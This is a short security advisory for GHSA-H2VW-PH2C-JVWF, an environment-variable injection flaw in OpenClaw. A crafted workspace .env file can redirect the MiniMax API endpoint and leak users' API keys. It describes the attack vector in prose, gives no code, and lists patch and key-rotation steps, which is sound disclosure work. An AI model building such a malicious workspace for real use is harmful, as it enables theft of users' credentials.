GHSA-H2VW-PH2C-JVWF: Credential Exfiltration via Environment Variable Injection in OpenClaw
Vulnerability ID: GHSA-H2VW-PH2C-JVWF
CVSS Score: 7.5
Published: 2026-04-25
OpenClaw versions prior to 2026.4.20 are vulnerable to an environment variable injection flaw that permits credential exfiltration. The application insecurely loads workspace-local .env files, allowing an attacker to override API endpoint routing for the MiniMax model provider. Opening a maliciously crafted workspace redirects authenticated requests to an attacker-controlled server, leaking the user's API keys.
TL;DR
An incomplete environment variable blocklist in OpenClaw allows untrusted workspace configurations to hijack the MiniMax API endpoint, leaking user API keys to attacker-controlled servers.
⚠️ Exploit Status: POC
Technical Details
- CWE ID: CWE-915 / CWE-20
- Attack Vector: Local Workspace Configuration
- Impact: Credential Exfiltration
- CVSS v3.1 Score: 7.5
- Exploit Status: Proof of Concept
- CISA KEV Listed: False
Affected Systems
- OpenClaw Personal AI Assistant (Versions < 2026.4.20)
-
OpenClaw: < 2026.4.20 (Fixed in:
2026.4.20)
Code Analysis
Commit: 2f06696
block MINIMAX_API_HOST workspace env injection and remove env-driven URL routing
Mitigation Strategies
- Upgrade OpenClaw application to a patched version.
- Implement restrictive access controls for unverified repositories.
- Rotate credentials if exposure is suspected.
Remediation Steps:
- Update OpenClaw to version 2026.4.20.
- Review local workspace directories for unrecognized
.envfile configurations. - Access the MiniMax provider console to revoke existing API keys.
- Generate new MiniMax API keys and configure them within the updated OpenClaw application.
References
Read the full report for GHSA-H2VW-PH2C-JVWF on our website for more details including interactive diagrams and full exploit analysis.
Top comments (0)